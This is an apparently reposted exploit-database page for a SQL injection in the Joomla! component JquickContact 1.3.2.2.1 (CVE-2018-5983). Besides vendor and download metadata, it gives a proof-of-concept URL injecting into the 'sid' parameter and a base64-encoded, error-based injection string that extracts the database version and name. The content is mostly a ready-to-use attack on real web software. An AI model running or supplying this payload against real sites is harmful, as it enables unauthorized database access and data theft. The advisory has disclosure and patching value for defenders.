joomla! component jquickcontact 1.3.2.2.1 sql injection
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# # # # # Exploit Title: Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection # Dork: N/A # Date: 16.02.2018 # Vendor: http://coderspirit.blogspot.com.tr/2011/07/jquickcontact.html # Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/jquickcontact/ # Download: https://sourceforge.net/projects/jquickcontact/files/latest/download # Version: 1.3.2.2.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-5983 # # # # # Exploit Author: Ihsan Sencan # # # # # # POC: # # 1) # http://localhost/[PATH]/index.php?option=com_jquickcontact&task=refresh&sid=[SQL] # # dnR0dGo3YXM4MzNvZDVuYTM3OWVlNDAwcDYnJTIwQU5EJTIwRVhUUkFDVFZBTFVFKDIyLENPTkNBVCgweDVjLHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpKSktLSUyMFg= # # # # #
Joomla! component jquickcontact 1.3.2.2.1 sql injection Vulnerability / Exploit Source : Joomla! component jquickcontact 1.3.2.2.1 sql injection